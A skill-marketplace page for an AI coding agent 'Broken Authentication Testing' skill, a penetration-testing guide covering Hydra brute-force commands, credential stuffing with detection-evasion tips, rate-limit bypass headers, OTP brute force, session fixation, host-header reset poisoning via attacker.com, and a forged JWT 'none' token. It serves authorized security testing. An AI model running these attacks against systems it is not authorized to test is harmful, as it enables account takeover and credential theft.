How do I install Broken Authentication Testing?

Install Broken Authentication Testing with a single command: npx mdskills install sickn33/broken-authentication. This downloads the skill files into your project and your AI agent picks them up automatically.

What platforms support Broken Authentication Testing?

Broken Authentication Testing works with Claude Code, Claude Desktop, Cursor, Vscode Copilot, Windsurf, Continue Dev, Codex, Gemini Cli, Amp, Roo Code, Goose, Opencode, Trae, Qodo, Command Code. Skills use the open SKILL.md format which is compatible with any AI coding agent that reads markdown instructions.

← Back to skills

Broken Authentication Testing

Name: Broken Authentication Testing: AI Agent Skill
Rating: 9 (1 reviews)
Author: sickn33

Verified

SecurityIntermediate

This skill should be used when the user asks to "test for broken authentication vulnerabilities", "assess session management security", "perform credential stuffing tests", "evaluate password policies", "test for session fixation", or "identify authentication bypass flaws". It provides comprehensive techniques for identifying authentication and session management weaknesses in web applications.

by @sickn330Updated 2 weeks ago

Add this skill

npx mdskills install sickn33/broken-authentication

Fork & Edit

Skill Advisor9.0

Comprehensive security testing guide with clear phases, examples, and practical command references

+Provides detailed step-by-step testing procedures across 10 authentication attack vectors
+Includes practical code examples, Burp Suite workflows, and command-line testing tools
+Documents security constraints, legal requirements, and proper authorization prerequisites
-Declares filesystem write permission but no workflow step requires writing files

SKILL.md

Edit in Browser

1---
2name: Broken Authentication Testing
3description: This skill should be used when the user asks to "test for broken authentication vulnerabilities", "assess session management security", "perform credential stuffing tests", "evaluate password policies", "test for session fixation", or "identify authentication bypass flaws". It provides comprehensive techniques for identifying authentication and session management weaknesses in web applications.
4metadata:
5  author: zebbern
6  version: "1.1"
7---
8 
9# Broken Authentication Testing
10 
11## Purpose
12 
13Identify and exploit authentication and session management vulnerabilities in web applications. Broken authentication consistently ranks in the OWASP Top 10 and can lead to account takeover, identity theft, and unauthorized access to sensitive systems. This skill covers testing methodologies for password policies, session handling, multi-factor authentication, and credential management.
14 
15## Prerequisites
16 
17### Required Knowledge
18- HTTP protocol and session mechanisms
19- Authentication types (SFA, 2FA, MFA)
20- Cookie and token handling
21- Common authentication frameworks
22 
23### Required Tools
24- Burp Suite Professional or Community
25- Hydra or similar brute-force tools
26- Custom wordlists for credential testing
27- Browser developer tools
28 
29### Required Access
30- Target application URL
31- Test account credentials
32- Written authorization for testing
33 
34## Outputs and Deliverables
35 
361. **Authentication Assessment Report** - Document all identified vulnerabilities
372. **Credential Testing Results** - Brute-force and dictionary attack outcomes
383. **Session Security Analysis** - Token randomness and timeout evaluation
394. **Remediation Recommendations** - Security hardening guidance
40 
41## Core Workflow
42 
43### Phase 1: Authentication Mechanism Analysis
44 
45Understand the application's authentication architecture:
46 
47```
48# Identify authentication type
49- Password-based (forms, basic auth, digest)
50- Token-based (JWT, OAuth, API keys)
51- Certificate-based (mutual TLS)
52- Multi-factor (SMS, TOTP, hardware tokens)
53 
54# Map authentication endpoints
55/login, /signin, /authenticate
56/register, /signup
57/forgot-password, /reset-password
58/logout, /signout
59/api/auth/*, /oauth/*
60```
61 
62Capture and analyze authentication requests:
63 
64```http
65POST /login HTTP/1.1
66Host: target.com
67Content-Type: application/x-www-form-urlencoded
68 
69username=test&password=test123
70```
71 
72### Phase 2: Password Policy Testing
73 
74Evaluate password requirements and enforcement:
75 
76```bash
77# Test minimum length (a, ab, abcdefgh)
78# Test complexity (password, password1, Password1!)
79# Test common weak passwords (123456, password, qwerty, admin)
80# Test username as password (admin/admin, test/test)
81```
82 
83Document policy gaps: Minimum length <8, no complexity, common passwords allowed, username as password.
84 
85### Phase 3: Credential Enumeration
86 
87Test for username enumeration vulnerabilities:
88 
89```bash
90# Compare responses for valid vs invalid usernames
91# Invalid: "Invalid username" vs Valid: "Invalid password"
92# Check timing differences, response codes, registration messages
93```
94 
95# Password reset
96"Email sent if account exists" (secure)
97"No account with that email" (leaks info)
98 
99# API responses
100{"error": "user_not_found"}
101{"error": "invalid_password"}
102```
103 
104### Phase 4: Brute Force Testing
105 
106Test account lockout and rate limiting:
107 
108```bash
109# Using Hydra for form-based auth
110hydra -l admin -P /usr/share/wordlists/rockyou.txt \
111  target.com http-post-form \
112  "/login:username=^USER^&password=^PASS^:Invalid credentials"
113 
114# Using Burp Intruder
1151. Capture login request
1162. Send to Intruder
1173. Set payload positions on password field
1184. Load wordlist
1195. Start attack
1206. Analyze response lengths/codes
121```
122 
123Check for protections:
124 
125```bash
126# Account lockout
127- After how many attempts?
128- Duration of lockout?
129- Lockout notification?
130 
131# Rate limiting
132- Requests per minute limit?
133- IP-based or account-based?
134- Bypass via headers (X-Forwarded-For)?
135 
136# CAPTCHA
137- After failed attempts?
138- Easily bypassable?
139```
140 
141### Phase 5: Credential Stuffing
142 
143Test with known breached credentials:
144 
145```bash
146# Credential stuffing differs from brute force
147# Uses known email:password pairs from breaches
148 
149# Using Burp Intruder with Pitchfork attack
1501. Set username and password as positions
1512. Load email list as payload 1
1523. Load password list as payload 2 (matched pairs)
1534. Analyze for successful logins
154 
155# Detection evasion
156- Slow request rate
157- Rotate source IPs
158- Randomize user agents
159- Add delays between attempts
160```
161 
162### Phase 6: Session Management Testing
163 
164Analyze session token security:
165 
166```bash
167# Capture session cookie
168Cookie: SESSIONID=abc123def456
169 
170# Test token characteristics
1711. Entropy - Is it random enough?
1722. Length - Sufficient length (128+ bits)?
1733. Predictability - Sequential patterns?
1744. Secure flags - HttpOnly, Secure, SameSite?
175```
176 
177Session token analysis:
178 
179```python
180#!/usr/bin/env python3
181import requests
182import hashlib
183 
184# Collect multiple session tokens
185tokens = []
186for i in range(100):
187    response = requests.get("https://target.com/login")
188    token = response.cookies.get("SESSIONID")
189    tokens.append(token)
190 
191# Analyze for patterns
192# Check for sequential increments
193# Calculate entropy
194# Look for timestamp components
195```
196 
197### Phase 7: Session Fixation Testing
198 
199Test if session is regenerated after authentication:
200 
201```bash
202# Step 1: Get session before login
203GET /login HTTP/1.1
204Response: Set-Cookie: SESSIONID=abc123
205 
206# Step 2: Login with same session
207POST /login HTTP/1.1
208Cookie: SESSIONID=abc123
209username=valid&password=valid
210 
211# Step 3: Check if session changed
212# VULNERABLE if SESSIONID remains abc123
213# SECURE if new session assigned after login
214```
215 
216Attack scenario:
217 
218```bash
219# Attacker workflow:
2201. Attacker visits site, gets session: SESSIONID=attacker_session
2212. Attacker sends link to victim with fixed session:
222   https://target.com/login?SESSIONID=attacker_session
2233. Victim logs in with attacker's session
2244. Attacker now has authenticated session
225```
226 
227### Phase 8: Session Timeout Testing
228 
229Verify session expiration policies:
230 
231```bash
232# Test idle timeout
2331. Login and note session cookie
2342. Wait without activity (15, 30, 60 minutes)
2353. Attempt to use session
2364. Check if session is still valid
237 
238# Test absolute timeout
2391. Login and continuously use session
2402. Check if forced logout after set period (8 hours, 24 hours)
241 
242# Test logout functionality
2431. Login and note session
2442. Click logout
2453. Attempt to reuse old session cookie
2464. Session should be invalidated server-side
247```
248 
249### Phase 9: Multi-Factor Authentication Testing
250 
251Assess MFA implementation security:
252 
253```bash
254# OTP brute force
255- 4-digit OTP = 10,000 combinations
256- 6-digit OTP = 1,000,000 combinations
257- Test rate limiting on OTP endpoint
258 
259# OTP bypass techniques
260- Skip MFA step by direct URL access
261- Modify response to indicate MFA passed
262- Null/empty OTP submission
263- Previous valid OTP reuse
264 
265# API Version Downgrade Attack (crAPI example)
266# If /api/v3/check-otp has rate limiting, try older versions:
267POST /api/v2/check-otp
268{"otp": "1234"}
269# Older API versions may lack security controls
270 
271# Using Burp for OTP testing
2721. Capture OTP verification request
2732. Send to Intruder
2743. Set OTP field as payload position
2754. Use numbers payload (0000-9999)
2765. Check for successful bypass
277```
278 
279Test MFA enrollment:
280 
281```bash
282# Forced enrollment
283- Can MFA be skipped during setup?
284- Can backup codes be accessed without verification?
285 
286# Recovery process
287- Can MFA be disabled via email alone?
288- Social engineering potential?
289```
290 
291### Phase 10: Password Reset Testing
292 
293Analyze password reset security:
294 
295```bash
296# Token security
2971. Request password reset
2982. Capture reset link
2993. Analyze token:
300   - Length and randomness
301   - Expiration time
302   - Single-use enforcement
303   - Account binding
304 
305# Token manipulation
306https://target.com/reset?token=abc123&user=victim
307# Try changing user parameter while using valid token
308 
309# Host header injection
310POST /forgot-password HTTP/1.1
311Host: attacker.com
312email=victim@email.com
313# Reset email may contain attacker's domain
314```
315 
316## Quick Reference
317 
318### Common Vulnerability Types
319 
320| Vulnerability | Risk | Test Method |
321|--------------|------|-------------|
322| Weak passwords | High | Policy testing, dictionary attack |
323| No lockout | High | Brute force testing |
324| Username enumeration | Medium | Differential response analysis |
325| Session fixation | High | Pre/post-login session comparison |
326| Weak session tokens | High | Entropy analysis |
327| No session timeout | Medium | Long-duration session testing |
328| Insecure password reset | High | Token analysis, workflow bypass |
329| MFA bypass | Critical | Direct access, response manipulation |
330 
331### Credential Testing Payloads
332 
333```bash
334# Default credentials
335admin:admin
336admin:password
337admin:123456
338root:root
339test:test
340user:user
341 
342# Common passwords
343123456
344password
34512345678
346qwerty
347abc123
348password1
349admin123
350 
351# Breached credential databases
352- Have I Been Pwned dataset
353- SecLists passwords
354- Custom targeted lists
355```
356 
357### Session Cookie Flags
358 
359| Flag | Purpose | Vulnerability if Missing |
360|------|---------|------------------------|
361| HttpOnly | Prevent JS access | XSS can steal session |
362| Secure | HTTPS only | Sent over HTTP |
363| SameSite | CSRF protection | Cross-site requests allowed |
364| Path | URL scope | Broader exposure |
365| Domain | Domain scope | Subdomain access |
366| Expires | Lifetime | Persistent sessions |
367 
368### Rate Limiting Bypass Headers
369 
370```http
371X-Forwarded-For: 127.0.0.1
372X-Real-IP: 127.0.0.1
373X-Originating-IP: 127.0.0.1
374X-Client-IP: 127.0.0.1
375X-Remote-IP: 127.0.0.1
376True-Client-IP: 127.0.0.1
377```
378 
379## Constraints and Limitations
380 
381### Legal Requirements
382- Only test with explicit written authorization
383- Avoid testing with real breached credentials
384- Do not access actual user accounts
385- Document all testing activities
386 
387### Technical Limitations
388- CAPTCHA may prevent automated testing
389- Rate limiting affects brute force timing
390- MFA significantly increases attack difficulty
391- Some vulnerabilities require victim interaction
392 
393### Scope Considerations
394- Test accounts may behave differently than production
395- Some features may be disabled in test environments
396- Third-party authentication may be out of scope
397- Production testing requires extra caution
398 
399## Examples
400 
401### Example 1: Account Lockout Bypass
402 
403**Scenario:** Test if account lockout can be bypassed
404 
405```bash
406# Step 1: Identify lockout threshold
407# Try 5 wrong passwords for admin account
408# Result: "Account locked for 30 minutes"
409 
410# Step 2: Test bypass via IP rotation
411# Use X-Forwarded-For header
412POST /login HTTP/1.1
413X-Forwarded-For: 192.168.1.1
414username=admin&password=attempt1
415 
416# Increment IP for each attempt
417X-Forwarded-For: 192.168.1.2
418# Continue until successful or confirmed blocked
419 
420# Step 3: Test bypass via case manipulation
421username=Admin (vs admin)
422username=ADMIN
423# Some systems treat these as different accounts
424```
425 
426### Example 2: JWT Token Attack
427 
428**Scenario:** Exploit weak JWT implementation
429 
430```bash
431# Step 1: Capture JWT token
432Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCJ9.signature
433 
434# Step 2: Decode and analyze
435# Header: {"alg":"HS256","typ":"JWT"}
436# Payload: {"user":"test","role":"user"}
437 
438# Step 3: Try "none" algorithm attack
439# Change header to: {"alg":"none","typ":"JWT"}
440# Remove signature
441eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4iLCJyb2xlIjoiYWRtaW4ifQ.
442 
443# Step 4: Submit modified token
444Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
445```
446 
447### Example 3: Password Reset Token Exploitation
448 
449**Scenario:** Test password reset functionality
450 
451```bash
452# Step 1: Request reset for test account
453POST /forgot-password
454email=test@example.com
455 
456# Step 2: Capture reset link
457https://target.com/reset?token=a1b2c3d4e5f6
458 
459# Step 3: Test token properties
460# Reuse: Try using same token twice
461# Expiration: Wait 24+ hours and retry
462# Modification: Change characters in token
463 
464# Step 4: Test for user parameter manipulation
465https://target.com/reset?token=a1b2c3d4e5f6&email=admin@example.com
466# Check if admin's password can be reset with test user's token
467```
468 
469## Troubleshooting
470 
471| Issue | Solutions |
472|-------|-----------|
473| Brute force too slow | Identify rate limit scope; IP rotation; add delays; use targeted wordlists |
474| Session analysis inconclusive | Collect 1000+ tokens; use statistical tools; check for timestamps; compare accounts |
475| MFA cannot be bypassed | Document as secure; test backup/recovery mechanisms; check MFA fatigue; verify enrollment |
476| Account lockout prevents testing | Request multiple test accounts; test threshold first; use slower timing |
477

Full transparency — inspect the skill content before installing.